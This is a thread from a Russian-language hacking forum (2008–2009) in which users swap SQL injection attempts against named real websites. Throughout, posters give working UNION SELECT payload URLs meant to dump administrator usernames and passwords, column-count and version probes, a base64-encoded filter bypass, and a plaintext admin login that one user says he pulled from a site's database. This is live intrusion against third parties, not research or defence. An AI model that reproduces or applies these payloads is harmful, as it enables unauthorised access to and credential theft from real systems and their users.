1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SQL непохек

Тема в разделе "Поиск уязвимостей", создана пользователем xeran, 1 сен 2008.

  1. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    я ж сказал, я пробегся скриптом, можешь забить, с 4-й базой и парой известных папок на сервере ты ничего не добъешься. а путь к майскл там небось не проще чего-то типа "qr572j87"...
     
    13 дек 2008
  2. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    Код:
    http://wisky.cn/adStatistic/goto.php?id=128+order+by+4/*
    вот подобрал, там 4.. но почему то невыводит ничего, подскажие в как быть?
     
    20 дек 2008
  3. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    :confused:
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 300 or greater.**
     
    24 дек 2008
  4. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Наткнулся на пару каких-то странных инжектов. С первого взгляда - типичный jPortal со всеми его уязвимостями, пятый мускул, никаких фильтров, НО стандартная админка отсутствует, пароли нехешированные, в обеих базах присутствует один и тот же админ (twojpulpit/pulpit123) и самое главное - логины админов не пашут. При вызове стандартной админки выскакивает ссылка на некую CMS ISPConfig (http://www.ispconfig.org/), у которой админка должна быть на 81 порту. В первом случае так и есть, но пароль не пашет. Во втором случае возможно порт другой. Есть еще админка на форум (/fadmin/), но в нем админов не нашел. Наборы таблиц простые и спрятать реальные админские логины вроде негде. Забавно еще, что при закачке движка с sourceforge NOD32 ругнулся на множественные угрозы. В общем, кому не лень, загляните, может какие умные мысли подкинете )
    Код:
    http://www.twojpulpit.com/articles.php?topic=0+union+select+1,group_concat(nick,0x3a,pass,0x3a,access+separator+0x7c),3,4,5+from+admins/*
    Код:
    http://clubbeat.pl/articles.php?topic=0+union+select+1,group_concat(nick,0x3a,pass,0x3a,access+separator+0x7c),3,4,5+from+admins/*
     
    6 янв 2009
  5. xeran
    xeran Продвинутый
    Симпатии:
    31
    HornetBlack,
    А у тебя не возникало мысли, что пароли не от этих админок ?
     
    6 янв 2009
  6. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Дык это-то понятно, что не от этих, но тогда где же от этих? Таблицы все как на ладони, а других учеток в них не видно. Чувствую, что эти открытые учетки фэйковые, но как добраться до реальных?
     
    6 янв 2009
  7. Mei
    Mei bit of love Продвинутый
    Симпатии:
    137
    Две скули, оставшиеся для меня непонятными. Никак не удавалось вывести столбцы. Гляньте, плиз, может там и ловить нечего? =)

    Код:
    http://www.dumarche.com/index.php?PHPSESSID=1234567890
    Код:
    http://dev.dostaryn.kz/news/?DS='
     
    11 фев 2009
  8. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    Код:
    http://dev.dostaryn.kz/news/?DS='
    тут инклуд, а не скуль..
     
    11 фев 2009
    1 человеку нравится это.
  9. seven
    seven Продвинутый
    Симпатии:
    16
    нашел скуль но не получается найти вывод может что нибудь не так делаю

    Код:
    http://www.release.no/artikkel.asp?ID=4943'
    http://www.release.no/artikkel.asp?ID=4943+and+1=1+ORDER+BY+7/*
    http://www.release.no/artikkel.asp?ID=-999999+union+all+select+1,2,3,4,5,6,7/*
    не могу найти поле для вывода
    версия 5
    Код:
    http://www.release.no/artikkel.asp?ID=4943+and+substring(version(),1,1)=5--
     
    Последнее редактирование: 13 фев 2009
    13 фев 2009
  10. Zik
    Zik Модератор
    Симпатии:
    169
    seven,
    ну ты даешь)) у тя что за версия бд, правильно асп а там запросы немного другие вот почитай на досуге

    а еще можно делать так
    _http://www.release.no/artikkel.asp?ID=adminnistrator
     
    Последнее редактирование: 13 фев 2009
    13 фев 2009
    1 человеку нравится это.
  11. seven
    seven Продвинутый
    Симпатии:
    16
    нашел сайт со скулей но не могу подобрать колличество колонок
    Код:
    http://enews.mcot.net/view.php?id=4896
    
    нашел базу mysql.user
    Код:
    http://enews.mcot.net/view.php?id=4896+and (SELECT 1 from mysql.user limit 0,1)=1--
    
    версия 5
    Код:
    http://enews.mcot.net/view.php?id=4896+and+substring(@@version,1,1)=5--
    
    как сделать запрос чтобы подобрать количество колонок order by не работает?
     
    14 фев 2009
  12. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    я туплю, или почему ты используешь запрос mssql? там же mysql
     
    14 фев 2009
  13. bug1z
    bug1z Новичок
    Симпатии:
    2
    а там запросы мускула не пашут о_О
    или я туплю?

    ps:faza02 привет)
     
    14 фев 2009
    1 человеку нравится это.
  14. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    Код:
    http://enews.mcot.net/view.php?id=-9999+union+select+user_name+from+mysql.user--
    Я тож туплю?
    При таком запросе пишет Failed to execute query Unknown column 'user_name' in 'field list'
    Код:
    http://enews.mcot.net/view.php?id=-9999+union+select+user+from+mysql.user--
    А при таком Failed to execute query The used SELECT statements have a different number of columns.
    Код:
    http://enews.mcot.net/view.php?id=-9999+union+select+user+from+user--
    При таком Failed to execute query Table 'engnews.user' doesn't exist
    Тоесть серв реагирует на то что мы вводим...
    Чтото сдесь есть....
    Либо мы жестоко тупим....
    offtop: я пошёл кушать, может тупить перестану...
     
    14 фев 2009
  15. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    11 столбцов, но вывести вам с них ничего не суждено, ибо скорее всего фильтруется юнион и фильтрацию не обойти... хотя на счет юниона не уверен, ибо даже "слепой" запрос не проходит. возможно дело в кодировке. сча гляну че там, если чего, отпишу...

    Добавлено через 5 минут
    Код:
    http://news.mcot.net/international/inside.php?value=bmlkPTc5MTg4IHVuaW9uIHNlbGVjdCAxLHZlcnNpb24oKSwzLDQsNSw2LDcsOCw5LDEwLyombnR5cGU9dGV4dA==
    ловите, детки)
     
    Последнее редактирование: 14 фев 2009
    14 фев 2009
    1 человеку нравится это.
  16. Zik
    Zik Модератор
    Симпатии:
    169
    NetSky,
    какую кодировку использовал? что то не понял
     
    14 фев 2009
  17. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    да не в кодировке дело... просто найди эту переменную в исходном варианте и глянь параметр, а потом декодируй его из бас64 и декодируй мой параметр, а потом сравни...
     
    14 фев 2009
    1 человеку нравится это.
  18. bug1z
    bug1z Новичок
    Симпатии:
    2
    NetSky, ты сайтом ошибся=)))))))
    не news.mcot.net а enews.mcot.net

    ток они какие то похожие очень=/
     
    14 фев 2009
    1 человеку нравится это.
  19. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Я б ткнул минус с уд-ствием..., чес слово... это поддомен на том же сайте, не неси бред.
     
    14 фев 2009
    1 человеку нравится это.
  20. Zik
    Zik Модератор
    Симпатии:
    169
    NetSky,
    не знал о таком варианте спасибо
     
    14 фев 2009

Поделиться этой страницей

Загрузка...